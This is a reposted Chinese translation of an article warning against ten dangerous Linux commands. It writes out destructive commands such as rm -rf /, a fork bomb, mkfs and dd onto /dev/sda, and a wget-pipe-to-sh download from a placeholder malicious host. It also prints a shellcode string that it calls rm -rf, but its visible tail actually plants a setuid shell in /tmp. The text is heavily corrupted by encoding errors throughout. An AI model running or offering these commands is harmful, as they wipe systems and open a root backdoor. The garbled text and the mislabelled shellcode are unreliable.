九龙心水论坛268888
全国免费热线:
永远不要在Linux执行的10个最危险的命令
作者:lx 点击:17570次 日期:2015-04-21
字号?#28023;?a href="#" onclick="javascript:setSize(12);return false;">T | T
      Linux命令行佷有用、很高效,也很有趣,但有时候也很危险,尤其是在你不确定你自己在正 在做什么时候。这篇文章并不打算引?#33576;?#23545;Linux或linux 命令行的愤怒。我们只是想让你意识到在你运行?#25215;?#21629;令时应该三?#32423;?#21518;行。(译注:?#27604;唬?#20197;下命令通常都是在root权限下才能将愚蠢发挥到无可救药;在普 通用户身份下,破坏的只是自己的一?#24230;?#20998;地。)
      1. rm -rf 命令
      rm -rf命令是?#22659;?#25991;件夹及其内容最快的方式之一。仅仅一丁点的?#20040;?#25110;无知都可能导致不可恢复的系统崩坏。下列是一些rm 命令的选项。
      rm 命令在Linux下通常用来?#22659;?#25991;件。
      rm -r 命令递归的?#22659;?#25991;件?#26657;?#29978;至是空的文件?#23567;#?#35793;注:个人认为此处应该是说错了,从常识看,应该是“甚至是?#24378;?#30340;文件?#23567;保?/div>
      rm -f 命令能不经过询问直接?#22659;?#21482;读文件’。(译注:Linux下?#22659;?#25991;件并不在乎该文件是否是只读的,而只是在意其父目录是否?#34892;?#26435;限。所以,-f这个参数只是表示不必一个个?#22659;?#30830;认,而是一律悄悄?#22659;?#21478;外,原始的rm命令其实也是没有?#22659;?#25552;示的,只是一般的发行版都会将rm通过别名的方式增加-i参数来要求?#22659;?#30830;认,而-f则抑制了这个提示。)
      rm -rf / : 强制?#22659;?#26681;目录下所有东东。(就是说?#22659;?#23436;毕后,什么也没有了。。。)
      rm -rf *: 强制?#22659;?#24403;前目录的所有文件。
      rm -rf . : 强制?#22659;?#24403;前文件夹及其子文件?#23567;?/div>
      从现在起,当你要执行rm -rf命令时请留心一点。我?#24378;?#20197;在“.bashrc”文件对‘rm‘命令创建rm -i的别名,来预防用 ‘rm‘命令?#22659;?#25991;件时的事故,它会要求你确认每一个?#22659;?#35831;求。(译注:大多数发行版已经这样做了,如果还没有,请这样做,并在使用-f参数前一定考虑好你在做什么!译者本人有着血泪的教训啊。)
      2. :(){:|:&};: 命令
      这就是个fork 炸弹的实例。具体操作是通过定义一个名为 ‘:‘的函数,它会调用自己两?#21361;?#19968;次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。
      :(){:|:&};:
      哦?你确认你要试试么?千万别在公司正式的服务器上实验啊~~
      3. 命令 > /dev/sda
      上列命令会将某个‘命令‘的输出写到块设备/dev/sda?#23567;?#35813;操作会将在块设备中的所有数据块替换为命令写入的原始数据,从而导致整个块设备的数据丢失。
      4. mv 文件夹 /dev/null
      这个命令会移动某个‘文件?#23567;?#21040;/dev/null。在Linux中 /dev/null 或 null 设备是一个特殊的文件,所?#34892;?#20837;它的数据都会被清除,然后返回写操作成功。(译注:这就是黑洞啊。?#27604;唬?#35201;说明的是,通过将文件夹移动到黑洞,并不能阻止数据恢复软件的?#20161;輳?#25152;以,真正的彻底毁灭,需要采用专用的软件或者手法来完成——我知道你肯定?#34892;?#19996;西想?#22659;?#24471;干?#21024;?#20928;的。)
      # mv /home/user/* /dev/null 
      上列命令会将User目录所有内容移动到/dev/null,这意味着所有东西都被‘卷入’黑?#30784;?null)之?#23567;?/div>
      5. wget http://malicious_source -O- | sh
      上列命令会从一个(也许是)恶意源下载一个脚本并执行。Wget命令会下载这个脚本,而sh会(无条件的)执行下载下来的脚本。
      注意: 你应该时刻注意你下载包或脚本的?#30784;?#21482;能使用?#20999;?#20174;可信任的源中下载脚本/程序。(译注?#26680;?#20197;,你真的知道你在做什么吗?当遇到这种需要是,我的做法是,先wget下来,然后我去读一读其中到底写了些什么,然后考虑是否执行。)
      6. mkfs.ext3 /dev/sda
      上列命令会格式化块设备‘sda’,你无疑知道在执行上列命令后你的块设备(?#25165;?#39537;动器)会被格式化,崭新的!没有任何数据,直接让你的系统达到不可恢复的阶段。(译注:通常不会直接使用/dev/sda这样的设备,除非是作为raw设备使用,一般都需要将sda分成类似sda1、sda2这样的?#26234;?#21518;才使用。?#27604;唬?#26080;论你使用sda还是sda1,这样对块设备或?#26234;?#36827;行mkfs都是毁灭性的,上面的数据都会被蒸发了。)
      7. > file
      上列命令常用来清空文件内容(译注:通常也用于记录命令输出。不过请在执行前,确认输出的文件是空的或者还不存在,否则原来的文件可真是恢复不?#32902;恕?#36830;数据恢复软件都未必能帮助你了。另外,我想你可能真正想用的是“>>?#20445;?#21363;累?#26377;?#30340;输出到文件,而不是刷新那个文件。)。如果用上列执行时输入错误或无知的输入类似 “> xt.conf” 的命令会覆盖配置文件或其他任何的系统配置文件。
      8. ^foo^bar
      这个命令在我们十个鲜为人知的 Linux 命令 – Part 3中描述过,用来编辑先前运行的命令而无需重打整个命令。但当用foobar命令时如果你没有彻底检查改变原始命令的风险,这可能导致真正的麻烦。(译注:事实上,这种小技巧是译者认为的,少数史前时代遗留下来的无用而有害的“黑客”技巧。)
      9. dd if=/dev/random of=/dev/sda
      上列命令会向块设备sda写入随机的垃圾文件从而擦出数据。?#27604;唬?#20320;的系统可能陷入混乱和不可恢复的状态。(译注:记得上面说过mv到黑洞并不能彻底?#22659;?#25968;据么?那么这个命令就是给了你一个彻底?#22659;?#30340;方法!?#27604;?#20026;了保险起见,你可以覆写多次。)
      10. 隐藏命令
      下面的命令其实就是上面第一个命令 (rm -rf)。这里的代码是隐藏在十六进制里的,一个无知的用户可能就会被愚弄。在终端里运行下面命令可能会擦除你的根?#26234;?/div>
      这个命令表明通常真正的危险是隐藏的,不会被轻易的检测到。你必须时刻留心你在做什么结果会怎样。不要编译/运行?#28216;?#30693;来源的代码。
      char esp[] __attribute__ ((section(“.text”))) /* e.s.p  
      release */  
      = “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″  
      “xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″  
      “xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″  
      “x56x04xf7x56x08xf7x56x0cx83xc4x74x56″  
      “x8dx73x08x56x53x54x59xb0x0bxcdx80x31″  
      “xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″  
      “x6ex2fx73x68x00x2dx63x00″  
      “cp -p /bin/sh /tmp/.beyond; chmod 4755  
      /tmp/.beyond;”; 
      注意: 不要在你的或你的同学或学校的电脑里的Linux终端或Shell执行以上的任何一个命令。如果你想测?#36816;?#20204;,请在虚拟机上运行。任何不和谐或数据丢失,由于运行上面的命令导致你的系统崩溃,文章作者和Tecmint概不负责。(译注:译者和转载网站也不负责~!)
      今天就到此为止吧,?#19968;?#24456;快回来这里,同时带上另一篇你们?#19981;?#30340;文章。到那时请继续关注和访问Tecmint。如果你知道任何其他危险的Linux命令,也想添加到我们的列表?#26657;?#35831;通过评论留言给我们同时也别忘?#32902;?#19979;你的宝贵意见。

发表评论

昵称 * 验证码 * 验证码
上一篇: CentOS常用命令
下一篇: 技术架构
九龙心水论坛268888